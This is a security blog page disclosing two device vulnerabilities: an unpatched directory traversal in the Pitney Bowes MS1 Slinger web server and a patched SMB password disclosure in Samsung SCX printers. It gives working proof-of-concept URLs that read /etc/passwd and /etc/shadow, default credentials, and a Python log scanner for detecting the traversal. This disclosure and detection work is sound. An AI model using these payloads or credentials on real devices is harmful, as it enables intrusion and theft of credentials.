0day

All posts tagged 0day

We have been trying to contact Pitney Bowes for ten months to report a security issue. After multiple attempts using email and Twitter, we decided to release the vulnerability to the public so that companies can protect themselves. One of the main driving factors behind this was when we found out that Pitney Bowes sells security services to other companies.
We strongly believe in responsible disclosure, and we also believe that if you sell security services you should be responsive to other researchers reporting issues in your products. While the directory traversal is serious, it also exposes weak default credentials which may work on other Pitney Bowes products.


Pitney Bowes MS1 Slinger Web Server Directory Traversal

Known Vulnerable Version
scversion=05.00.0021
AppScSchema=01.12.0005.0000

Proof of Concept

  1. The Slinger web service listens on TCP port 8008
  2. Retrieve etc/passwd: http://<IP>:8008/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
  3. Retrieve etc/shadow: http://<IP>:8008/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow
  4. The default credentials are pb:pb
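The defender's side of the Slinger issue, as an added example that is not Pitney Bowes code: the canonicalization a web server must apply before mapping a request path onto the filesystem, plus a scan over access-log lines to find requests of the shape shown in the PoC. The log lines are constructed for the example.

```python
from urllib.parse import unquote, urlsplit

# Constructed access-log lines (not from the advisory); the two flagged
# requests reuse the encoded path shape from the PoC above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2016:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2016:10:00:01 +0000] "GET /%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1420',
    '10.0.0.9 - - [01/Jan/2016:10:00:02 +0000] "GET /%2f..%2f..%2f..%2f..%2fetc%2fshadow HTTP/1.1" 200 900',
    '10.0.0.7 - - [01/Jan/2016:10:00:03 +0000] "GET /docs/../index.html HTTP/1.1" 200 512',
]

def canonical_path(raw_path, max_rounds=3):
    """Percent-decode until stable (bounded), so %2f / %2F / %2e%2e become the
    literal '/' and '..' the traversal check must see; also catches %252f."""
    path = raw_path
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def is_traversal(raw_path):
    """True if the decoded path climbs above the document root. Resolution is
    lexical: a name descends, '..' ascends, and ascending past level 0 is the
    Slinger bug. A '..' that stays inside the root (/docs/../x) is allowed."""
    depth = 0
    for seg in canonical_path(raw_path).split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False

def flag_requests(log_lines):
    """(client_ip, raw_path) for each log line whose request path traverses;
    run over historical access logs to look for past exploitation."""
    hits = []
    for line in log_lines:
        quoted = line.split('"')
        if len(quoted) < 2:
            continue
        request = quoted[1].split()  # METHOD PATH PROTOCOL
        if len(request) < 2 or not is_traversal(urlsplit(request[1]).path):
            continue
        hits.append((line.split()[0], request[1]))
    return hits
```

A server that applies `is_traversal` after decoding, rather than comparing the raw request string against a blocklist, rejects the `%2f` variant and its double-encoded form alike.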

About a year ago during a network penetration test I found an information disclosure vulnerability in a Samsung printer. The disclosure was fairly serious; NTLM hashes for any network accounts were stored in a CSV file. I’m not a web application penetration tester, but luckily the connection was slow enough that I watched the page load briefly and then redirect to the next page. This definitely highlights the importance of manually testing.

Because this has been responsibly disclosed and patched it isn’t technically an 0day.

The firmware fixing the vulnerability was released over six months ago, and I didn’t want to publish any vulnerability information irresponsibly. The following is the information submitted to Samsung and links to the updated firmware. Updating any Samsung printers is important. Equally important is adding printers and other peripheral devices to your patching program.


SyncThru Web SMB Password Disclosure

Known Vulnerable Versions
Samsung SCX-5835_5935 Series Printer
Main Firmware Version: 2.01.00.26
Network Firmware Version: V4.01.05(SCX-5835/5935) 12-22-2008
Engine Firmware Version: 1.20.73
UI Firmware Version: V1.03.01.55 07-13-2009
Finisher Firmware Version: Not Installed
PCL5E Firmware Version: PCL5e 5.87 11-07-2008
PCL6 Firmware Version: PCL6 5.86 10-28-2008
PostScript Firmware Version: PS3 V1.93.06 12-19-2008
SPL Firmware Version: SPL 5.32 01-03-2008
TIFF Firmware Version: TIFF 0.91.00 10-07-2008

Samsung SCX-5635 Series
Main Firmware Version: 2.01.01.18 12-08-2009
Network Firmware Version: V4.01.16(SCX-5635) 12-04-2009
Engine Firmware Version: 1.31.32
PCL5E Firmware Version: PCL5e 5.92 02-12-2009
PCL6 Firmware Version: PCL6 5.93 03-21-2009
PostScript Firmware Version: PS3 1.94.06 12-22-2008
TIFF Firmware Version: TIFF 0.91.00 10-07-2008

Proof of Concept

  1. This procedure does not seem to work using Internet Explorer 7 but behaves as expected with Firefox 4.0.1.
  2. Using the default username and password (admin/admin), it is possible to obtain all credentials used for SMB file transfer. To obtain the file, access http://<printer url>/smb_serverList.csv
  3. The UserName and UserPassword fields are unencrypted and visible using any text editor.

Links to Updated Firmware
http://downloadcenter.samsung.com/content/FM/201508/20150825111208555/SCX5635_V2.01.01.28_0401113_1.00.zip
http://downloadcenter.samsung.com/content/FM/201508/20150825112233867/SCX5835_5935_V2.01.00.56_0401113_1.01.zip

Acknowledgements
Samsung security and I had a few miscommunications and I chose to hold off on releasing this until I knew that a patch was available. When I inquired again they immediately rectified the situation.

Contact security@samsung.com if you happen to find any additional vulnerabilities.